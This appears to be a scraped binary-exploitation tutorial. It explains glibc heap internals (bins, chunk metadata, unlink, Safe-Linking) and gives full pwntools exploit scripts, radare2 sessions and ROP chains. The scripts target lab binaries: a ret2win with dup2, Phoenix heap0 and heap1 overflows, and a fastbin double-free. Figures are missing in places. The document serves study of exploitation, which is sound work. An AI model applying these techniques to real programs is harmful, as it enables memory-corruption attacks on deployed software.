In the interest of being as efficient as possible, glibc makes a lot of effort to recycle previously-used chunks for future requests in the program. As an example, let's say we need 100
bytes to store a string input by the user. Once we are finished with it, we tell glibc we are no longer going to use it. Later in the program, we have to input another 100-byte string from the user. Why not reuse that same part of memory? There's no reason not to, right?
It is the bins that are responsible for the bulk of this memory recycling. A bin is a (doubly- or singly-linked) list of free chunks. For efficiency, different bins are used for different sizes, and the operations will vary depending on the bins as well to keep high performance.
When a chunk is freed, it is "moved" to the bin. This movement is not physical, but rather a pointer - a reference to the chunk - is stored somewhere in the list.
There are four bins: fastbins, the unsorted bin, smallbins and largebins.
When a chunk is freed, the function that does the bulk of the work in glibc is _int_free()
. I won't delve into the source code right now, but will provide hyperlinks to glibc 2.3, a very old one without security checks. You should have a go at familiarising yourself with what the code says, but bear in mind things have been moved about a bit to get to there they are in the present day! You can change the version on the left in bootlin to see how it's changed.
First, the size
of the chunk is checked. If it is less than the largest fastbin size, add it to the correct fastbin
Otherwise, if it's mmapped, munmap
the chunk
Finally, consolidate them and put them into the unsorted bin
What is consolidation? We'll be looking into this more concretely later, but it's essentially the process of finding other free chunks around the chunk being freed and combining them into one large chunk. This makes the reuse process more efficient.
Fastbins store small-sized chunks. There are 10 of these for chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80 or 88 bytes including metadata.
There is only one of these. When small and large chunks are freed, they end of in this bin to speed up allocation and deallocation requests.
Essentially, this bin gives the chunks one last shot at being used. Future malloc requests, if smaller than a chunk currently in the bin, split up that chunk into two pieces and return one of them, speeding up the process - this is the Last Remainder Chunk. If the chunk requested is larger, then the chunks in this bin get moved to the respective Small/Large bins.
There are 62 small bins of sizes 16, 24, ... , 504 bytes and, like fast bins, chunks of the same size are stored in the same bins. Small bins are doubly-linked and allocation and deallocation is FIFO.
The purpose of the FD
and BK
pointers as we saw before are to points to the chunks ahead and behind in the bin.
Before ending up in the unsorted bin, contiguous small chunks (small chunks next to each other in memory) can coalesce (consolidate), meaning their sizes combine and become a bigger chunk.
63 large bins, can store chunks of different sizes. The free chunks are ordered in decreasing order of size, meaning insertions and deletions can occur at any point in the list.
The first 32 bins have a range of 64 bytes:
1st bin: 512 - 568 bytes
2nd bin: 576 - 632 bytes
[...]
Like small chunks, large chunks can coalesce together before ending up in the unsorted bin.
Each bin is represented by two values, the HEAD
and TAIL
. As it sounds, HEAD
is at the top and TAIL
at the bottom. Most insertions happen at the HEAD
, so in LIFO structures (such as the fastbins) reallocation occurs there too, whereas in FIFO structures (such as small bins) reallocation occurs at the TAIL
. For fastbins, the TAIL
is null
.
Unlike the stack, heap is an area of memory that can be dynamically allocated. This means that when you need new space, you can "request" more from the heap.
In C, this often means using functions such as malloc()
to request the space. However, the heap is very slow and can take up tons of space. This means that the developer has to tell libc when the heap data is "finished with", and it does this via calls to free()
which mark the area as available. But where there are humans there will be implementation flaws, and no amount of protection will ever ensure code is completely safe.
In the following sections, we will only discuss 64-bit systems (with the exception of some parts that were written long ago). The theory is the same, but pretty much any heap challenge (or real-world application) will be on 64-bit systems.
When a non-fast chunk is freed, it gets put into the Unsorted Bin. When new chunks are requested, glibc looks at all of the bins
If the requested size is fastbin size, check the corresponding fastbin
If there is a chunk in it, return it
If the requested chunk is of smallbin size, check the corresponding smallbin
If there is a chunk in it, return it
If the requested chunk is large (of largebin size), we first consolidate the largebins with malloc_consolidate()
. We will get into the mechanisms of this at a later point, but essentially I lied earlier - fastbins do consolidate, but not on freeing!
Finally, we iterate through the chunks in the unsorted bin
If it is empty, we service the request through making the heap larger by moving the top chunk back and making space
If the requested size is equal to the size of the chunk in the bin, return the chunk
If it's smaller, split the chunk in the bin in two and return a portion of the correct size
If it's larger,
One thing that is very easy to forget is what happens on allocation and what happens on freeing, as it can be a bit counter-intuitive. For example, the fastbin consolidation is triggered from an allocation!
Much like the name suggests, this technique involves us using data once it is freed. The weakness here is that programmers often wrongly assume that once the chunk is freed it cannot be used and don't bother writing checks to ensure data is not freed. This means it is possible to write data to a free chunk, which is very dangerous.
TODO: binary
void vuln(int childfd) {
char buffer[30];
read(childfd, buffer, 500);
write(childfd, "Thanks!", 8);
}
void win() {
system("/bin/sh");
}
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
payload = b'AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA'
pause()
p.sendline(payload)
$ r2 -d -A $(pidof vuln)
[0x7f741033bdee]> pdf @ sym.vuln
[...]
â”” 0x0040126b c3 ret
[0x7f741033bdee]> db 0x0040126b
[0x7f741033bdee]> dc
hit breakpoint at: 40126b
[0x0040126b]> pxq @ rsp
0x7ffd323ee6f8 0x41415041414f4141 0x4153414152414151 AAOAAPAAQAARAASA
[...]
[0x0040126b]> wopO 0x41415041414f4141
40
payload = flat(
'A' * 40,
elf.sym['win']
)
p.sendline(payload)
p.interactive()
$ ROPgadget --binary vuln | grep "pop rdi"
0x000000000040150b : pop rdi ; ret
$ ROPgadget --binary vuln | grep "pop rsi"
0x0000000000401509 : pop rsi ; pop r15 ; ret
POP_RDI = 0x40150b
POP_RSI_R15 = 0x401509
payload = flat(
'A' * 40,
POP_RDI,
4, # newfd
POP_RSI_R15,
0, # oldfd -> stdin
0, # junk r15
elf.plt['dup2'],
POP_RDI,
4, # newfd
POP_RSI_R15,
1, # oldfd -> stdout
0, # junk r15
elf.plt['dup2'],
elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
POP_RDI = 0x40150b
POP_RSI_R15 = 0x401509
payload = flat(
'A' * 40,
POP_RDI,
4, # newfd
POP_RSI_R15,
0, # oldfd -> stdin
0, # junk r15
elf.plt['dup2'],
POP_RDI,
4, # newfd
POP_RSI_R15,
1, # oldfd -> stdout
0, # junk r15
elf.plt['dup2'],
elf.sym['win']
)
p.sendline(payload)
p.recvuntil('Thanks!\x00')
p.interactive()
from pwn import *
elf = context.binary = ELF('./vuln')
p = remote('localhost', 9001)
rop = ROP(elf)
rop.raw('A' * 40)
rop.dup2(4, 0)
rop.dup2(4, 1)
rop.win()
p.sendline(rop.chain())
p.recvuntil('Thanks!\x00')
p.interactive()
Fastbins are a singly-linked list of chunks. The point of these is that very small chunks are reused quickly and efficiently. To aid this, chunks of fastbin size do not consolidate (they are not absorbed into surrounding free chunks once freed).
A fastbin is a LIFO (Last-In-First-Out) structure, which means the last chunk to be added to the bin is the first chunk to come out of it. Glibc only keeps track of the HEAD, which points to the first chunk in the list (and is set to 0
if the fastbin is empty). Every chunk in the fastbin has an fd
pointer, which points to the next chunk in the bin (or is 0
if it is the last chunk).
When a new chunk is freed, it's added at the front of the list (making it the head):
The fd
of the newly-freed chunk is overwritten to point at the old head of the list
HEAD is updated to point to this new chunk, setting the new chunk as the head of the list
Let's have a visual demonstration (it will help)! Try out the following C program:
#include <stdio.h>
#include <stdlib.h>
int main() {
char *a = malloc(20);
char *b = malloc(20);
char *c = malloc(20);
printf("a: %p\nb: %p\nc: %p\n", a, b, c);
puts("Freeing...");
free(a);
free(b);
free(c);
puts("Allocating...");
char *d = malloc(20);
char *e = malloc(20);
char *f = malloc(20);
printf("d: %p\ne: %p\nf: %p\n", d, e, f);
}
We get:
a: 0x2292010
b: 0x2292030
c: 0x2292050
Freeing...
Allocating...
d: 0x2292050
e: 0x2292030
f: 0x2292010
As you can see, the chunk a
gets reassigned to chunk f
, b
to e
and c
to d
. So, if we free()
a chunk, there's a good chance our next malloc()
- if it's of the same size - will use the same chunk.
It can be really confusing as to why we add and remove chunks from the start of the list (why not the end?), but it's really just the most efficient way to add an element. Let's say we have this fastbin setup:
HEAD --> a -> b
In this case HEAD points to a
, and a
points onwards to b
as the next chunk in the bin (because the fd
field of a
points to b
). Now let's say we free another chunk c
. If we want to add it to the end of the list like so:
HEAD --> a -> b -> c
We would have to update the fd
pointer of b
to point at c
. But remember that glibc only keeps track of the first chunk in the list - it only has the HEAD stored. It has no information about the end of this list, which could be many chunks long. This means that to add c
in at the end, it would first have to start at the head and traverse through the entire list until it got to the last chunk, then overwrite the fd
field of the last chunk to point at c
and make c
the last chunk.
Meanwhile, if it adds at the HEAD:
HEAD --> c -> a -> b
All we need to do is:
Set the fd
of c
to point at a
This is easy, as a
was the old head, so glibc had a pointer to it stored already
HEAD is then updated to c
, making it the head of the list
This is also easy, as the pointer to c
is freely available
This has much less overhead!
For reallocating the chunk, the same principle applies - it's much easier to update HEAD to point to a
by reading the fd
of c
than it is to traverse the entire list until it gets to the end.
Internally, every chunk - whether allocated or free - is stored in a malloc_chunk
structure. The difference is how the memory space is used.
When space is allocated from the heap using a function such as malloc()
, a pointer to a heap address is returned. Every chunk has additional metadata that it has to store in both its used and free states.
The chunk has two sections - the metadata of the chunk (information about the chunk) and the user data, where the data is actually stored.
The size
field is the overall size of the chunk, including metadata. It must be a multiple of 8
, meaning the last 3 bits of the size
are 0
. This allows the flags A
, M
and P
to take up that space, with A
being the 3rd-last bit of size
, M
the 2nd-last and P
the last.
The flags have special uses:
P
is the PREV_INUSE
flag, which is set when the previous adjacent chunk (the chunk ahead) is in use
M
is the IS_MMAPPED
flag, which is set when the chunk is allocated via mmap()
rather than a heap mechanism such as malloc()
A
is the NON_MAIN_ARENA
flag, which is set when the chunk is not located in main_arena
; we will get to Arenas in a later section, but in essence every created thread is provided a different arena (up to a limit) and chunks in these arenas have the A
bit set
prev_size
is set if the previous adjacent chunk is free, as calculated by P
being 0
. If it is not, the heap saves space and prev_size
is part of the previous chunk's user data. If it is, then prev_size
stores the size of the previous chunk.
Free chunks have additional metadata to handle the linking between them.
This can be seen in the malloc_state
struct:
struct malloc_chunk {
INTERNAL_SIZE_T mchunk_prev_size; /* Size of previous chunk (if free). */
INTERNAL_SIZE_T mchunk_size; /* Size in bytes, including overhead. */
struct malloc_chunk* fd; /* double links -- used only if free. */
struct malloc_chunk* bk;
/* Only used for large blocks: pointer to next larger size. */
struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
struct malloc_chunk* bk_nextsize;
};
http://exploit.education/phoenix/heap-one/
This program:
Allocates a chunk on the heap for the heapStructure
Allocates another chunk on the heap for the name
of that heapStructure
Repeats the process with another heapStructure
Copies the two command-line arguments to the name
variables of the heapStructures
Prints something
Let's break on and after the first strcpy
.
As we expected, we have two pairs of heapStructure
and name
chunks. We know the strcpy
will be copying into wherever name
points, so let's read the contents of the first heapStructure
. Maybe this will give us a clue.
Look! The name
pointer points to the name
chunk! You can see the value 0x602030
being stored.
This isn't particularly a revelation in itself - after all, we knew there was a pointer in the chunk. But now we're certain, and we can definitely overwrite this pointer due to the lack of bounds checking. And because we can also control the value being written, this essentially gives us an arbitrary write!
And where better to target than the GOT?
The plan, therefore, becomes:
Pad until the location of the pointer
Overwrite the pointer with the GOT address of a function
Set the second parameter to the address of winner
Next time the function is called, it will call winner
But what function should we overwrite? The only function called after the strcpy
is printf
, according to the source code. And if we overwrite printf
with winner
it'll just recursively call itself forever.
Luckily, compilers like gcc
compile printf
as puts
if there are no parameters - we can see this with radare2:
So we can simply overwrite the GOT address of puts
with winner
. All we need to find now is the padding until the pointer and then we're good to go.
Break on and after the strcpy
again and analyse the second chunk's name
pointer.
The pointer is originally at 0x8d9050
; once the strcpy occurs, the value there is 0x41415041414f4141
.
The offset is 40.
Again, null bytes aren't allowed in parameters so you have to remove them.
A double-free can take a bit of time to understand, but ultimately it is very simple.
Firstly, remember that for fast chunks in the fastbin, the location of the next chunk in the bin is specified by the fd
pointer. This means if chunk a
points to chunk b
, once chunk a
is freed the next chunk in the bin is chunk b
.
In a double-free, we attempt to control fd
. By overwriting it with an arbitrary memory address, we can tell malloc()
where the next chunk is to be allocated. For example, say we overwrote a->fd
to point at 0x12345678
; once a
is free, the next chunk on the list will be 0x12345678
.
As it sounds, we have to free the chunk twice. But how does that help?
Let's watch the progress of the fastbin if we free an arbitrary chunk a
twice:
Fairly logical.
But what happens if we called malloc()
again for the same size?
Well, strange things would happen. a
is both allocated (in the form of b
) and free at the same time.
If you remember, the heap attempts to save as much space as possible and when the chunk is free the fd
pointer is written where the user data used to be.
But what does this mean?
When we write into the use data of b
, we're writing into the fd
of a
at the same time.
And remember - controlling fd
means we can control where the next chunk gets allocated!
So we can write an address into the data of b
, and that's where the next chunk gets placed.
Now, the next alloc will return a
again. This doesn't matter, we want the one afterwards.
Boom - an arbitrary write.
http://exploit.education/phoenix/heap-zero/
Luckily it gives us the source:
So let's analyse what it does:
Allocates two chunks on the heap
Sets the fp
variable of chunk f
to the address of nowinner
Copies the first command-line argument to the name
variable of the chunk d
Runs whatever the fp
variable of f
points at
The weakness here is clear - it runs a random address on the heap. Our input is copied there after the value is set and there's no bound checking whatsoever, so we can overrun it easily.
Let's check out the heap in normal conditions.
We'll break right after the strcpy and see how it looks.
If we want, we can check the contents.
So, we can see that the function address is there, after our input in memory. Let's work out the offset.
Since we want to work out how many characters we need until the pointer, I'll just use a .
Let's break on and after the strcpy
. That way we can check the location of the pointer then immediately read it and calculate the offset.
So, the chunk with the pointer is located at 0x2493060
. Let's continue until the next breakpoint.
radare2 is nice enough to tell us we corrupted the data. Let's analyse the chunk again.
Notice we overwrote the size
field, so the chunk is much bigger. But now we can easily use the first value to work out the offset (we could also, knowing the location, have done pxq @ 0x02493060
).
So, fairly simple - 80 characters, then the address of winner
.
Consolidating fastbins
, I said that chunks that went to the unsorted bin would consolidate, but fastbins would not. This is technically not true, but they don't consolidate automatically; in order for them to consolidate, the function has to be called. This function looks complicated, but it essentially just grabs all adjacent fastbin chunks and combines them into larger chunks, placing them in the unsorted bin.
Why do we care? Well, UAFs and the like are very nice to have, but a Read-After-Free on a fastbin chunk can only ever leak you a heap address, as the singly-linked lists only use the fd
pointer which points to another chunk (on the heap) or is NULL. We want to get a libc leak as well!
If we free enough adjacent fastbin chunks at once and trigger a call to malloc_consolidate()
, they will consolidate to create a chunk that goes to the unsorted bin. The unsorted bin is doubly-linked, and acts accordingly - if it is the only element in the list, both fd
and bk
will point to a location in malloc_state
, which is contained within libc.
This means that the more important thing for us to know is how we can trigger a largebin consolidation.
Some of the most important ways include:
Inputting a very long number into scanf
(around 0x400
characters long)
This works because the code responsible for it manages a scratch_buffer
and assigns it 0x400
bytes, but uses malloc
when the data is too big (along with realloc
if it gets even bigger than the heap chunk, and free
at the end, so it works to trigger those functions too - great for triggering hooks!).
Inputting something along the lines of %10000c
into a format string vulnerability also triggers a chunk to be created
Both of these work because a largebin allocation triggers malloc_consolidate
.By checking the calls to the function in (2.35), we can find other triggers.
The most common and most important trigger, a call to malloc()
requesting a chunk of largebin size will .
There is another call to it in the section . This section is called when the top chunk has to be used to service the request. The checks if the top chunk is large enough to service the request:
If not, checks if there are fastchunks in the arena. If there are, it calls malloc_consolidate
to attempt to regain space to service the request!
So, by filling the heap and requesting another chunk, we can trigger a call to malloc_consolidate()
.
(If both conditions fail, _int_malloc
falls back to esssentially using mmap
to service the request).
TODO
Calling will consolidate fastbins (which makes sense, given the name malloc_trim
). Unlikely to ever be useful, but please do let me know if you find a use for it!
When changing malloc options using mallopt
, . This is pretty useless, as mallopt
is likely called once (if at all) in the program prelude before it does anything.
else if (atomic_load_relaxed (&av->have_fastchunks))
{
malloc_consolidate (av);
/* restore original bin index */
if (in_smallbin_range (nb))
idx = smallbin_index (nb);
else
idx = largebin_index (nb);
}
/*
If this is a large request, consolidate fastbins before continuing [...]
*/
else
{
idx = largebin_index (nb);
if (atomic_load_relaxed (&av->have_fastchunks))
malloc_consolidate (av);
}
if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
{
remainder_size = size - nb;
remainder = chunk_at_offset (victim, nb);
av->top = remainder;
set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
It wouldn't be fun if there were no protections, right?
Using Xenial Xerus, try running:
#include <stdio.h>
#include <stdlib.h>
int main() {
int *a = malloc(0x50);
free(a);
free(a);
return 1;
}
Notice that it throws an error.
Is the chunk at the top of the bin the same as the chunk being inserted?
For example, the following code still works:
#include <stdio.h>
#include <stdlib.h>
int main() {
int *a = malloc(0x50);
int *b = malloc(0x50);
free(a);
free(b);
free(a);
return 1;
}
When removing the chunk from a fastbin, make sure the size falls into the fastbin's range
The previous protection could be bypassed by freeing another chunk in between the double-free and just doing a bit more work that way, but then you fall into this trap.
Namely, if you overwrite fd
with something like 0x08041234
, you have to make sure the metadata fits - i.e. the size ahead of the data is completely correct - and that makes it harder, because you can't just write into the GOT, unless you get lucky.
Reintroducing double-frees
Tcache poisoning is a fancy name for a double-free in the tcache chunks.
Heap Overflow, much like a Stack Overflow, involves too much data being written to the heap. This can result in us overwriting data, most importantly pointers. Overwriting these pointers can cause user input to be copied to different locations if the program blindly trusts data on the heap.
To introduce this (it's easier to understand with an example) I will use two vulnerable binaries from Protostar.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
struct heapStructure {
int priority;
char *name;
};
int main(int argc, char **argv) {
struct heapStructure *i1, *i2;
i1 = malloc(sizeof(struct heapStructure));
i1->priority = 1;
i1->name = malloc(8);
i2 = malloc(sizeof(struct heapStructure));
i2->priority = 2;
i2->name = malloc(8);
strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
printf("and that's a wrap folks!\n");
}
void winner() {
printf(
"Congratulations, you've completed this level @ %ld seconds past the "
"Epoch\n",
time(NULL));
}
$ r2 -d -A heap1 AAAA BBBB
$ r2 -d -A heap1
$ s main; pdf
[...]
0x004006e6 e8f5fdffff call sym.imp.strcpy ; char *strcpy(char *dest, const char *src)
0x004006eb bfa8074000 mov edi, str.and_that_s_a_wrap_folks ; 0x4007a8 ; "and that's a wrap folks!"
0x004006f0 e8fbfdffff call sym.imp.puts
$ ragg2 -P 200 -r
AABAA...
$ r2 -d -A heap1 AAABAA... 0000
[0x004006cd]> wopO 0x41415041414f4141
40
from pwn import *
elf = context.binary = ELF('./heap1', checksec=False)
param1 = (b'A' * 40 + p64(elf.got['puts'])).replace(b'\x00', b'')
param2 = p64(elf.sym['winner']).replace(b'\x00', b'')
p = elf.process(argv=[param1, param2])
print(p.clean().decode('latin-1'))
char *a = malloc(0x20);
free(a);
free(a);
char *b = malloc(0x20);
strcpy(b, "\x78\x56\x34\x12");
malloc(0x20) /* This is yet another 'a', we can ignore this */
char *controlled = malloc(0x20); /* This is in the location we want */
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
struct data {
char name[64];
};
struct fp {
void (*fp)();
char __pad[64 - sizeof(unsigned long)];
};
void winner() {
printf("Congratulations, you have passed this level\n");
}
void nowinner() {
printf(
"level has not been passed - function pointer has not been "
"overwritten\n");
}
int main(int argc, char **argv) {
struct data *d;
struct fp *f;
if (argc < 2) {
printf("Please specify an argument to copy :-)\n");
exit(1);
}
d = malloc(sizeof(struct data));
f = malloc(sizeof(struct fp));
f->fp = nowinner;
strcpy(d->name, argv[1]);
printf("data is at %p, fp is at %p, will be calling %p\n", d, f, f->fp);
fflush(stdout);
f->fp();
return 0;
}
$ r2 -d -A heap0 AAAAAAAAAAAA <== that's just a parameter
$ s main; pdf
[...]
0x0040075d e8fefdffff call sym.imp.strcpy ; char *strcpy(char *dest, const char *src)
0x00400762 488b45f8 mov rax, qword [var_8h]
[...]
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x400762
$ ragg2 -P 200 -r
$ r2 -d -A heap0 AAABAACAADAAE...
[0x004006f8]> db 0x0040075d
[0x004006f8]> db 0x00400762
[0x004006f8]> dc
hit breakpoint at: 0x40075d
[0x0040075d]> dc
hit breakpoint at: 0x400762
[0x00400762]> wopO 0x6441416341416241
80
from pwn import *
elf = context.binary = ELF('./heap0')
payload = (b'A' * 80 + flat(elf.sym['winner'])).replace(b'\x00', b'')
p = elf.process(argv=[payload])
print(p.clean().decode('latin-1'))
When a chunk is removed from a bin, unlink()
is called on the chunk. The unlink macro looks like this:
FD = P->fd; /* forward chunk */
BK = P->bk; /* backward chunk */
FD->bk = BK; /* update forward chunk's bk pointer */
BK->fd = FD; /* updated backward chunk's fd pointer */
Note how fd
and bk
are written to location depending on fd
and bk
- if we control both fd
and bk
, we can get an arbitrary write.
Consider the following example:
We want to write the value 0x1000000c
to 0x5655578c
. If we had the ability to create a fake free chunk, we could choose the values for fd
and bk
. In this example, we would set fd
to 0x56555780
(bear in mind the first 0x8
bytes in 32-bit would be for the metadata, so P->fd
is actually 8 bytes off P
and P->bk
is 12 bytes off) and bk
to 0x10000000
. Then when we unlink()
this fake chunk, the process is as follows:
FD = P->fd (= 0x56555780)
BK = P->bk (= 0x10000000)
FD->bk = BK (0x56555780 + 0xc = 0x10000000)
BK->fd = FD (0x10000000 + 0x8 = 0x56555780)
This may seem like a lot to take in. It's a lot of seemingly random numbers. What you need to understand is P->fd
just means 8 bytes off P
and P->bk
just means 12 bytes off P
.
If you imagine the chunk looking like
Then the fd
and bk
pointers point at the start of the chunk - prev_size
. So when overwriting the fd
pointer here:
FD->bk = BK (0x56555780 + 0xc = 0x10000000)
FD
points to 0x56555780
, and then 0xc
gets added on for bk
, making the write actually occur at 0x5655578c
, which is what we wanted. That is why we fake fd
and bk
values lower than the actual intended write location.
The slight issue with the unlink exploit is not only does fd
get written to where you want, bk
gets written as well - and if the location you are writing either of these to is protected memory, the binary will crash.
More modern libc versions have a different version of the unlink macro, which looks like this:
FD = P->fd;
BK = P->bk;
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
malloc_printerr (check_action, "corrupted double-linked list", P, AV);
else {
FD->bk = BK;
BK->fd = FD;
}
Here unlink()
check the bk
pointer of the forward chunk and the fd
pointer of the backward chunk and makes sure they point to P
, which is unlikely if you fake a chunk. This quite significantly restricts where we can write using unlink.
Still on Xenial Xerus, means both mentioned checks are still relevant. The bypass for the second check (malloc() memory corruption) is given to you in the form of fake metadata already set to a suitable size. Let's check the (relevant parts of) the source.
char fakemetadata[0x10] = "\x30\0\0\0\0\0\0\0"; // so we can ignore the "wrong size" error
char admin[0x10] = "Nuh-huh\0";
// List of users to keep track of
char *users[15];
int userCount = 0;
The fakemetadata
variable is the fake size of 0x30
, so you can focus on the double-free itself rather than the protection bypass. Directly after this is the admin
variable, meaning if you pull the exploit off into the location of that fake metadata, you can just overwrite that as proof.
users
is a list of strings for the usernames, and userCount
keeps track of the length of the array.
void main_loop() {
while(1) {
printf(">> ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
switch (choice)
{
case 1:
createUser();
break;
case 2:
deleteUser();
break;
case 3:
complete_level();
default:
break;
}
}
}
Prompts for input, takes in input. Note that main()
itself prints out the location of fakemetadata
, so we don't have to mess around with that at all.
void createUser() {
char *name = malloc(0x20);
users[userCount] = name;
printf("%s", "Name: ");
read(0, name, 0x20);
printf("User Index: %d\nName: %s\nLocation: %p\n", userCount, users[userCount], users[userCount]);
userCount++;
}
createUser()
allocates a chunk of size 0x20
on the heap (real size is 0x30
including metadata, hence the fakemetadata
being 0x30
) then sets the array entry as a pointer to that chunk. Input then gets written there.
void deleteUser() {
printf("Index: ");
char input[2];
read(0, input, sizeof(input));
int choice = atoi(input);
char *name = users[choice];
printf("User %d:\n\tName: %s\n", choice, name, name);
// Check user actually exists before freeing
if(choice < 0 || choice >= userCount) {
puts("Invalid Index!");
return;
}
else {
free(name);
puts("User freed!");
}
}
Get index, print out the details and free()
it. Easy peasy.
void complete_level() {
if(strcmp(admin, "admin\n")) {
puts("Level Complete!");
return;
}
}
Checks you overwrote admin
with admin
, if you did, mission accomplished!
There's literally no checks in place so we have a plethora of options available, but this tutorial is about using a double-free, so we'll use that.
First let's make a skeleton of a script, along with some helper functions:
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)
def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))
def complete():
p.sendlineafter('>> ', '3')
print(p.recvline())
As we know with the fasttop
protection, we can't allocate once then free twice - we'll have to free once inbetween.
create('yes')
create('yes')
delete(0)
delete(1)
delete(0)
Let's check the progression of the fastbin by adding a pause()
after every delete()
. We'll hook on with radare2 using
r2 -d $(pidof vuln)
Due to its size, the chunk will go into Fastbin 2, which we can check the contents of using dmhf 2
(dmhf
analyses fastbins, and we can specify number 2).
Looks like the first chunk is located at 0xd58000
. Let's keep going.
The next chunk (Chunk 1) has been added to the top of the fastbin, this chunk being located at 0xd58030
.
Boom - we free Chunk 0 again, adding it to the fastbin for the second time. radare2 is nice enough to point out there's a double-free.
Now we have a double-free, let's allocate Chunk 0 again and put some random data. Because it's also considered free, the data we write is seen as being in the fd
pointer of the chunk. Remember, the heap saves space, so fd
when free is located exactly where data is when allocated (probably explained better here).
So let's write to fd
, and see what happens to the fastbin. Remove all the pause()
instructions.
create(p64(0x08080808))
pause()
Run, debug, and dmhf 2
.
The last free()
gets reused, and our "fake" fastbin location is in the list. Beautiful.
Let's push it to the top of the list by creating two more irrelevant users. We can also parse the fakemetadata
location at the beginning of the exploit chain.
p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
log.success('Fake Metadata: ' + hex(fake_metadata))
[...]
create('junk1')
create('junk2')
pause()
The reason we have to subtract 8 off fakemetadata
is that the only thing we faked in the souce is the size
field, but prev_size
is at the very front of the chunk metadata. If we point the fastbin freelist at the fakemetadata
variable it'll interpret it as prev_size
and the 8 bytes afterwards as size
, so we shift it all back 8 to align it correctly.
Now we can control where we write, and we know where to write to.
First, let's replace the location we write to with where we want to:
create(p64(fake_metadata))
Now let's finish it off by creating another user. Since we control the fastbin, this user gets written to the location of our fake metadata, giving us an almost arbitrary write.
create('\x00' * 8 + 'admin\x00')
complete()
$ python3 exploit.py
[+] Starting local process 'vuln': pid 8296
[+] Fake Metadata: 0x602088
b'Level Complete!\n'
Awesome - we completed the level!
from pwn import *
elf = context.binary = ELF('./vuln', checksec=False)
p = process()
def create(name='a'):
p.sendlineafter('>> ', '1')
p.sendlineafter('Name: ', name)
def delete(idx):
p.sendlineafter('>> ', '2')
p.sendlineafter('Index: ', str(idx))
def complete():
p.sendlineafter('>> ', '3')
print(p.recvline())
p.recvuntil('data: ')
fake_metadata = int(p.recvline(), 16) - 8
log.success('Fake Metadata: ' + hex(fake_metadata))
create('yes')
create('yes')
delete(0)
delete(1)
delete(0)
create(p64(fake_metadata))
create('junk1')
create('junk2')
create('\x00' * 8 + 'admin\x00')
complete()
Mixing it up a bit - you can try the 32-bit version yourself. Same principle, offsets a bit different and stuff. I'll upload the binary when I can, but just compile it as 32-bit and try it yourself :)
Starting from glibc 2.32, a new Safe-Linking mechanism was implemented to protect the singly-linked lists (the fastbins and tcachebins). The theory is to protect the fd
pointer of free chunks in these bins with a mangling operation, making it more difficult to overwrite it with an arbitrary value.
Every single fd
pointer is protected by , which is undone by :
Here, pos
is the location of the current chunk and ptr
the location of the chunk we are pointing to (which is NULL if the chunk is the last in the bin). Once again, we are using ASLR to protect! The >>12
gets rid of the predictable last 12 bits of ASLR, keeping only the random upper 52 bits (or effectively 28, really, as the upper ones are pretty predictable):
It's a very rudimentary protection - we use the current location and the location we point to in order to mangle it. From a programming standpoint, it has virtually no overhead or performance impact. We can see that PROTECT_PTR
has been implemented in and two locations in _int_free()
(for fastbins) and . You can find REVEAL_PTR
used as well.
So, what does this mean to an attacker?
Again, heap leaks are key. If we get a heap leak, we know both parts of the XOR in PROTECT_PTR
, and we can easily recreate it to fake our own mangled pointer.
It might be tempting to say that a partial overwrite is still possible, but there is a new security check that comes along with this Safe-Linking mechanism, the alignment check. This check ensures that chunks are 16-bit aligned and is only relevant to singly-linked lists (like all of Safe-Linking). A quick Ctrl-F for unaligned
in will bring up plenty of different locations. The most important ones for us as attackers is probably the one in tcache_get()
and the ones in _int_malloc()
.
When trying to get a chunk e
out of the tcache, alignment is checked.
There are three checks here. First on , the macro for removing a chunk from a fastbin:
Once on :
And lastly on every fastbin chunk during the :
_int_free()
checks the alignment if the tcache_entry
is already set to the value it's meant to be and it has to do a whole double-free iteration check:
When all the fastbins are consolidated into the , they are :
Not super important functions for attackers, but fastbin chunks are checked for alignment in , , , .
You may notice some of them use while others use .
The macros are defined side-by-side, but really aligned_OK
is for addresses while misaligned_chunk
is for chunks.
is defined as such:
is defined for i386 as 16
. In binary that's 10000
, so MALLOC_ALIGN_MASK
is 1111
, so the final byte is checked. This results in 16-bit alignment, as expected.
This alignment check means you would have to guess 16 bits of entropy, leading to a 1/16 chance if you attempt to brute-force the last 16 bits to be
Creating an interactive char driver is surprisingly simple, but there are a few traps along the way.
This is by far the hardest part to understand, but honestly a full understanding isn't really necessary. The new intro_init
function looks like this:
A major number is essentially the unique identifier to the kernel module. You can specify it using the first parameter of register_chrdev
, but if you pass 0
it is automatically assigned an unused major number.
We then have to register the class and the device. In complete honesty, I don't quite understand what they do, but this code exposes the module to /dev/intro
.
Note that on an error it calls class_destroy
and unregister_chrdev
:
These additional classes and devices have to be cleaned up in the intro_exit
function, and we mark the major number as available:
In intro_init
, the first line may have been confusing:
The third parameter fops
is where all the magic happens, allowing us to create handlers for operations such as read
and write
. A really simple one would look something like:
